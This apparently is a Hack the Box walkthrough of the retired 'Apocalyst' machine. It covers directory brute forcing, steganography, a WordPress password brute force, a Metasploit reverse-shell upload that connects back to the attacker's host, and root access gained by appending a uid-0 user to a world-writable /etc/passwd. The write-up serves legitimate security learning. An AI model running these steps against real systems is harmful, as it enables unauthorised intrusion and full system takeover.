Apocalyst: Retired 25 Nov 2017

If you are interested in learning more about penetration testing, Hack the Box is a great way to get your feet wet in a legal and well built environment. Head over to hackthebox.eu to get started.

Enumeration

Using Sparta, I ran a staged NMAP scan against the target host: 10.10.10.46. This scan revealed two open ports:

Port 22 - SSH

OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

This is expected and nothing about this indicated that this would be a useful exploit path.

Port 80 - HTTP

Apache httpd 2.4.18 ((Ubuntu))

Browsing to the site reveals a Wordpress blog about apocalypse preparation but does not seem to display correctly. Clicking on any of the links takes you to a apcoalyst.htb domain that does not resolve properly. Updating the /etc/hosts file to resolve apcoalyst.htb domain to 10.10.10.46 quickly solved that problem. Initial inspection with WPScan showed that the blog is fairly up to date (version 4.8) with no major vulnerabilities to exploit.

Initial enumeration of the blog posts shows that the path syntax for the posts is 10.10.10.46/?p=<number> where <number> corresponds to the post number. Using Burp intruder to enumerate all post numbers from 0-20 did not reveal any "hidden" posts but confirmed the existence of the posts linked from the homepage.

Accessing the login page and using the author name from the posts mentioned above confirms that user falaraki is a valid user. Simple password brute force of common passwords was not successful.

The next step was to conduct some directory brute forcing using WFUZZ.

wfuzz -c --follow --hc 404 -z file,/usr/share/wordlists/wfuzz/general/medium.txt http://10.10.10.46/FUZZ

This revealed a large number of valid directories. All of the directories seemed to simply load an image (image.jpg) that are all the same. Suspecting that these images meant something and that there might be a distinguishing factor, I decided to use a more specific wordlist for the directory brute force by using cewl. Using the CO2 Burp extension that contains the Cewler utility, I generated a new word list of 577 words.

cewler

Using this wordlist, I made a little Bash script to grab the image file from all the valid directories.

cat wordlist | xargs -I % wget 10.10.10.46/%/image.jpg -O %-image.jpg

Looking at all of the returned files, they all seem to be identical with a size of 207552 bytes. 'Greping' out all of the files of that size, revealed the special file in the directory Rightiousness. Additional, looking at the source for this page reveals a comment that says needle so looking at the returns from the directory brute force tool would have also indicated a page of different length than all the others.

ls -al *.jpg | grep -v 207552

Suspecting some form of steganography, I used steghide to try to extract the contents. After hours of trying to figure out the password to the stego file, I finally stumbled upon the fact that there was NO password and discovered the hidden list.txt file.

steghide --extract -sf Rightiousness.jpg

Initial Access

Using the list.txt files as a new word list I tried both another directory brute force and a password brute force on the falaraki user. The password brute force using WPScan revealed a successful user/password combo of falaraki:Transcilisiation.

wpscan --url http://10.10.10.46 --wordlist list.txt --username falaraki

With admin access to the Wordpress site, the next obvious step was to generate a malicious payload to get shell access to the host. This is simply using Metasploit.

use exploit/unix/webapp/wp_admin_shell_upload
set payload php/meterpreter/reverse_tcp
set password Transclisiation
set rhost 10.10.10.46
set username falaraki
set lhost 10.10.xx.xx
set lport 443

The shell triggered immediately and I had access at the www-data user. Browsing to /home/falaraki revealed no only the user hash for credit but also a .secret file that appeared to be base64 encoded. Decoding the file using cat .secret | base64 -d revealed a message and a password.

Suspecting that the user might also have used this password as their SSH login, I tried this combo to login to the host directly successfully giving me more stable low-privilege access to the host.

Privilege Escalation

Using a common Linux enumeration script (https://github.com/rebootuser/LinEnum) I immediately noticed that the passwd file was world-writable.

world-writable

Recalling other challenges with a similar vulnerability, I was able to quickly gain root access by appending the passwd file with my own root level user due the fact that the Linux system will read additional suers of the same ID but a different username from /etc/passwd. See this Stack Exchange question for more details: https://security.stackexchange.com/questions/151700/privilege-escalation-using-passwd-file.

perl -le 'print crypt("thisisonlyatest", "aa")'
echo "gl0b0:aa9RPMhupm.dU:0:0:root:/root:/bin/bash" >> passwd
su gl0b0
thisisonlyatest

Logging in as my newly created user yielded Root access and full compromise of the box.

What I Learned

  • Enumeration is key and when enumeration does not seem like it is enough, try to use the information you have directly from the source to aid enumeration (Cewl).
  • ALWAYS try to access with no password, people are silly sometimes. This would have saved me HOURS of time trying to brute force passwords, specifically on the stego portion.
  • I had forgotten that when appending to /etc/passwd the appended lines must have unique usernames, that ID is what will yield root level access. I had attempted to write a new root line and was not successful until I remembered this.